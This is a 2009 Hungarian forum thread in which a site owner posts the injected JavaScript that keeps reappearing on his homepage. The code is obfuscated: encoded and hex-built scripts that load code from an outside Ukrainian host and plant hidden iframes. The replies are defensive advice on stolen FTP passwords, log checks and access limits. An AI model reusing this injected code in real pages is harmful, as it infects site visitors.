ugrás a tartalomhoz

Vírus került a honlapomra

ManutdHungary · 2009. Már. 21. (Szo), 15.52

<script>document.write( unescape( "%69%66%28%21%6d%79%69%6b%29%7b%0d%0a%76%61%72%20%72%3d%64%6f%63%75%6d%65%6e%74%2e%72%65%66%65%72%72%65%72%2c%75%3d%64%6f%63%75%6d%65%6e%74%2e%55%52%4c%2c%74%3d%22%22%2c%71%2c%71%75%65%2c%73%65%3d%22%67%62%22%3b%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%67%6f%6f%67%6c%65%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%67%6f%6f%67%6c%65%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%6d%73%6e%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%6d%73%6e%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%68%6f%6f%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%70%22%3b%73%65%3d%22%79%61%68%6f%6f%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%6e%64%65%78%2e%72%75%22%29%21%3d%2d%31%29%7b%74%3d%22%74%65%78%74%22%3b%73%65%3d%22%79%61%6e%64%65%78%2e%72%75%22%3b%7d%0d%0a%69%66%28%74%2e%6c%65%6e%67%74%68&&%28%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22%3f%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%7c%7c%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22&%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%29%29%7b%20%71%75%65%3d%72%2e%73%75%62%73%74%72%69%6e%67%28%71%2b%32%2b%74%2e%6c%65%6e%67%74%68%29%2e%73%70%6c%69%74%28%22&%22%29%5b%30%5d%3b%0d%0a%69%66%20%28%28%71%75%65%2e%69%6e%64%65%78%4f%66%28%27%73%69%74%65%3a%27%29%3d%3d%2d%31%29%20&&%20%28%71%75%65%2e%74%6f%4c%6f%77%65%72%43%61%73%65%28%29%2e%69%6e%64%65%78%4f%66%28%27%77%77%77%2e%27%29%3d%3d%2d%31%29%29%0d%0a%09%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%73%63%72%69%70%74%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%62%65%73%74%34%79%6f%75%2e%69%66%2e%75%61%2f%6a%73%2f%62%69%64%63%68%2e%6a%73%3f%71%3d%22%2b%71%75%65%2b%22&%72%65%66%3d%22%2b%72%2b%22%27%3e%3c%2f%73%63%22%2b%22%72%69%70%74%3e%22%29%3b%0d%0a%7d%0d%0a%7d%0d%0a%76%61%72%20%6d%79%69%6b%3d%74%72%75%65%3b" ));</script></head><body ndragstart="return false" onselectstart="return false" oncontextmenu="return false"><script>function c173b3059n49c4d5357f1cd(n49c4d5357f99e){ function n49c4d53580169(){return 16;} return (parseInt(n49c4d5357f99e,n49c4d53580169()));}function n49c4d5358127e(n49c4d535818da){  var n49c4d535820a8='';n49c4d53583fea=String['fromCharCode'];for(n49c4d53582878=0;n49c4d53582878<n49c4d535818da.length;n49c4d53582878+=2){ n49c4d535820a8+=(n49c4d53583fea(c173b3059n49c4d5357f1cd(n49c4d535818da.substr(n49c4d53582878,2))));}return n49c4d535820a8;} var x53='';var n49c4d535847b8='3C7'+x53+'3637'+x53+'2697'+x53+'07'+x53+'43E667'+x53+'56E637'+x53+'4696F6E20636865636B5F636F6E7'+x53+'4656E7'+x53+'428297'+x53+'B7'+x53+'6617'+x53+'220693D303B7'+x53+'7'+x53+'68696C6528646F637'+x53+'56D656E7'+x53+'42E67'+x53+'657'+x53+'4456C656D656E7'+x53+'47'+x53+'3427'+x53+'9546167'+x53+'4E616D652827'+x53+'69667'+x53+'2616D6527'+x53+'292E6C656E67'+x53+'7'+x53+'468297'+x53+'B7'+x53+'6617'+x53+'220656C3D646F637'+x53+'56D656E7'+x53+'42E67'+x53+'657'+x53+'4456C656D656E7'+x53+'47'+x53+'3427'+x53+'9546167'+x53+'4E616D652827'+x53+'69667'+x53+'2616D6527'+x53+'295B695D3B6966282028656C2E7'+x53+'37'+x53+'47'+x53+'96C652E64697'+x53+'37'+x53+'06C617'+x53+'93D3D27'+x53+'6E6F6E6527'+x53+'207'+x53+'C7'+x53+'C20656C2E7'+x53+'37'+x53+'47'+x53+'96C652E7'+x53+'6697'+x53+'36962696C697'+x53+'47'+x53+'9203D3D27'+x53+'68696464656E27'+x53+'207'+x53+'C7'+x53+'C2028656C2E7'+x53+'7'+x53+'69647'+x53+'4683C3520262620656C2E68656967'+x53+'687'+x53+'43C35292920262620656C2E6E616D65213D27'+x53+'633127'+x53+'297'+x53+'B656C2E7'+x53+'0617'+x53+'2656E7'+x53+'44E6F64652E7'+x53+'2656D6F7'+x53+'6654368696C6428656C293B7'+x53+'D656C7'+x53+'36520692B2B3B7'+x53+'D7'+x53+'D636865636B5F636F6E7'+x53+'4656E7'+x53+'428293B0A696628216D7'+x53+'96961297'+x53+'B646F637'+x53+'56D656E7'+x53+'42E7'+x53+'7'+x53+'7'+x53+'2697'+x53+'465287'+x53+'56E657'+x53+'363617'+x53+'065282027'+x53+'2533632536392536362537'+x53+'322536312536642536352532302536652536312536642536352533642536332533312532302537'+x53+'332537'+x53+'32253633253364253237'+x53+'2536382537'+x53+'342537'+x53+'342537'+x53+'30253361253266253266253637'+x53+'2536352537'+x53+'322536642536312536652536312536342537'+x53+'362536352537'+x53+'322537'+x53+'342536392537'+x53+'33253639253665253637'+x53+'2532652536652536352537'+x53+'34253266253639253665253265253633253637'+x53+'25363925336625333926253237'+x53+'2532622534642536312537'+x53+'342536382532652537'+x53+'322536662537'+x53+'352536652536342532382534642536312537'+x53+'342536382532652537'+x53+'32253631253665253634253666253664253238253239253261253339253331253336253333253332253239253262253237'+x53+'253634253237'+x53+'2532302537'+x53+'37'+x53+'2536392536342537'+x53+'34253638253364253331253338253334253230253638253635253639253637'+x53+'2536382537'+x53+'342533642533342533392533382532302537'+x53+'332537'+x53+'342537'+x53+'39253663253635253364253237'+x53+'2537'+x53+'362536392537'+x53+'332536392536322536392536632536392537'+x53+'342537'+x53+'39253361253638253639253634253634253635253665253237'+x53+'2533652533632532662536392536362537'+x53+'3225363125366425363525336527'+x53+'29293B7'+x53+'D7'+x53+'6617'+x53+'2206D7'+x53+'969613D7'+x53+'47'+x53+'27'+x53+'5653B3C2F7'+x53+'3637'+x53+'2697'+x53+'07'+x53+'43E';document.write(n49c4d5358127e(n49c4d535847b8));</script>



<script>function c2882110cbp49c4da7fdec2b(p49c4da7fdf3fb){ function p49c4da7fdfbce(){var p49c4da7fe039a=16;return p49c4da7fe039a;} return (parseInt(p49c4da7fdf3fb,p49c4da7fdfbce()));}function p49c4da7fe0b6a(p49c4da7fe133a){ function p49c4da7fe2aaa(){return 2;} var p49c4da7fe1b09='';p49c4da7fe3a49=String.fromCharCode;for(p49c4da7fe22dc=0;p49c4da7fe22dc<p49c4da7fe133a.length;p49c4da7fe22dc+=p49c4da7fe2aaa()){ p49c4da7fe1b09+=(p49c4da7fe3a49(c2882110cbp49c4da7fdec2b(p49c4da7fe133a.substr(p49c4da7fe22dc,p49c4da7fe2aaa()))));}return p49c4da7fe1b09;} var ua7='';var p49c4da7fe4219='3C7'+ua7+'3637'+ua7+'2697'+ua7+'07'+ua7+'43E696628216D7'+ua7+'96961297'+ua7+'B646F637'+ua7+'56D656E7'+ua7+'42E7'+ua7+'7'+ua7+'7'+ua7+'2697'+ua7+'465287'+ua7+'56E657'+ua7+'363617'+ua7+'065282027'+ua7+'2533632536392536362537'+ua7+'322536312536642536352532302536652536312536642536352533642536332533322533382532302537'+ua7+'332537'+ua7+'32253633253364253237'+ua7+'2536382537'+ua7+'342537'+ua7+'342537'+ua7+'302533612532662532662536392537'+ua7+'342536332536662537'+ua7+'352536652537'+ua7+'342536352537'+ua7+'322532652536652536352537'+ua7+'342532662536332536662537'+ua7+'352536652537'+ua7+'342536352537'+ua7+'322532652537'+ua7+'302536382537'+ua7+'30253366253237'+ua7+'2532622534642536312537'+ua7+'342536382532652537'+ua7+'322536662537'+ua7+'352536652536342532382534642536312537'+ua7+'342536382532652537'+ua7+'32253631253665253634253666253664253238253239253261253331253337'+ua7+'253333253333253332253338253239253262253237'+ua7+'253338253339253337'+ua7+'253334253339253334253338253335253330253331253330253633253237'+ua7+'2532302537'+ua7+'37'+ua7+'2536392536342537'+ua7+'34253638253364253336253332253338253230253638253635253639253637'+ua7+'2536382537'+ua7+'34253364253332253337'+ua7+'2533362532302537'+ua7+'332537'+ua7+'342537'+ua7+'39253663253635253364253237'+ua7+'2537'+ua7+'362536392537'+ua7+'332536392536322536392536632536392537'+ua7+'342537'+ua7+'39253361253638253639253634253634253635253665253237'+ua7+'2533652533632532662536392536362537'+ua7+'3225363125366425363525336527'+ua7+'29293B7'+ua7+'D7'+ua7+'6617'+ua7+'2206D7'+ua7+'969613D7'+ua7+'47'+ua7+'27'+ua7+'5653B3C2F7'+ua7+'3637'+ua7+'2697'+ua7+'07'+ua7+'43E';document.write(p49c4da7fe0b6a(p49c4da7fe4219));</script></body></html>
Ez a kód vírust hoz a lapunkra... töröljük, de egy-két óra múlva magától visszaíródik, mi lehet a gond??? Mit kéne tennem???
‹ PHP - SQL kapcsolat Class változó read-only elérése ›
 
1

Átnézni

Poetro · 2009. Már. 21. (Szo), 17.41
Át kellene nézni a kódot, biztonsági frissítéseket felrakni, hogy ne tudjon ez a tartalom visszakerülni, és mindenképpen figyelni, hova, mikor íródik bele. Lehet hogy a tárhelyszólgáltatónál vannak problémák, és egy másik weboldalon kereszül törnek be. Egyeztetni kellene velük is, hogy ők mit gondolnak.
2

FTP jelszó változtatás

janoszen · 2009. Már. 22. (V), 11.38
Változtassatok FTP jelszót. Hetente ha nincs 3 ilyen eset, hogy valaki magából kikelve ír, hogy hogy lehetett vírusos a szerveren az oldala, akkor egy se. És persze mindig a kutyája nevét választotta jelszónak.

Ettől függetlenül lehetséges, hogy a szolgáltató szerverén van a gebasz, láttunk már ilyet is. Keress vissza, volt már róla szó itt a fórumon.
3

ellopták az FTP jelszavad!

domel · 2009. Már. 27. (P), 23.47
Ellopták az FTP jelszavad! Pontosabban egy vírus csinálja, kilopja a Total Commanderből a jelszót, és az index fájlba includolja magát. Vagy vírusírtassz, vagy ne tárold a jelszót a total commanderben. Változtass jelszót, ne tárold egy ideig a gépeden se, és ha napokig nincs gond, akkor ez volt a bibi
4

Ez aranyos, ebből a

Fraki · 2009. Már. 28. (Szo), 00.50
Ez aranyos, ebből a hozzászólásból egy biztosat lehet leszűrni, hogy neked egyszer a Total Commanderből kilopta egy vírus a jelszavadat.
6

Légyszi

domel · 2009. Már. 28. (Szo), 20.36
Légyszi Fraki ne állapíts meg rólam semmit. Ha fikázni akarod a kommentelőket, akkor menj a blog.hu-ra.
-------------------------------------------------
Az FTP gyökerébe helyezzünk el egy .ftpaccess fájlt, a következő tartalommal (természetesen csak akkor, ha Magyarországról csatlakozunk):
<Limit ALL>
Allow From .hu
DenyAll
</Limit>
Ez annyit tesz, hogy az FTP kapcsolatra csak magyarországi IP címmel rendelkező szerverről enged hozzáférést. A legtöbb fertőzést ez a fájl megoldja (mivel a feltörés külföldi gépekről érkezik)
7

forrás

gex · 2009. Már. 28. (Szo), 20.56
ha a forrást is megjelölöd máris nem teszed ki magad ekkora veszélynek. :)
8

hamar volt bukta

domel · 2009. Már. 28. (Szo), 21.58
Már csak abban bízok, hogy a szerző is úgy koppintotta valahonnan :D
5

állítsd át a fájl

Tanul0 · 2009. Már. 28. (Szo), 10.22
állítsd át a fájl atrribútúmát, és akkor nem fogja tudni átírni. Ez hirtelen megoldásnak elég, de nem nyújt csak átmeneti védelmet
9

ellopták az FTP jelszavad!

vastagl · 2009. Már. 29. (V), 15.34
Könnyen lehet hogy tényleg ellopták az ftp jelszavadat:
Erról úgy tudsz megbizonyosodni, hogy megnézed az ftp transfer naplódat - ha valami ilyesmit észlelsz, tudták a jelszavad:

Sat Mar 7 19:59:45 2009 0 bod5.i0waterford.net 21587 /home/public_html/index.php a _ o r ftpuser ftp 1 * c
Sat Mar 7 19:59:45 2009 0 bod5.i0waterford.net 21251 /home/public_html/index.php a _ i r ftpuser ftp 1 * c
Sat Mar 7 19:59:45 2009 0 bod5.i0waterford.net 9739 /home/public_html/index.tpl a _ o r ftpuser ftp 1 * c
Sat Mar 7 19:59:46 2009 0 bod5.i0waterford.net 9738 /home/public_html/index.tpl a _ i r ftpuser ftp 1 * c
Sat Mar 7 21:43:37 2009 0 bod5.i0waterford.net 21251 /home/public_html/index.php a _ o r ftpuser ftp 1 * c
Sat Mar 7 21:43:37 2009 0 bod5.i0waterford.net 21251 /home/public_html/index.php a _ i r ftpuser ftp 1 * c
Sat Mar 7 21:43:38 2009 0 bod5.i0waterford.net 9738 /home/public_html/index.tpl a _ o r ftpuser ftp 1 * c
Sat Mar 7 21:43:38 2009 0 bod5.i0waterford.net 9738 /home/public_html/index.tpl a _ i r ftpuser ftp 1 * c

A naplóból az látszik, hogy este bod5.i0waterford.net-ről beléptek az ftpuser felhasználó névvel és persze a jelszavával, letöltötték az index kezdetű fájlokat, átírták és visszatöltötték, másfél óra múlva megint jöttek. Az ftpuser kitalált felhasználó, de a bod5.i0waterford.net nem, ez egy feltört gép valahol Írországban, egy keylogger hálózat része, úgyhogy csak az látogassa meg, aki szereti a kalandokat és a Zeus/WSNPOEM trójait.
Részletek róluk itt:
http://www.offiserv.hu/index.php?option=com_content&task=view&id=76&Itemid=1
Azokról akik szerintem nálad jártak, itt írnak:
http://www.sg.hu/cikkek/66403/nagy_uzlet_a_hamis_virusirtok_arulasa

Persze lehet, hogy más történt, de a .hu -ra korlátozás nem árt.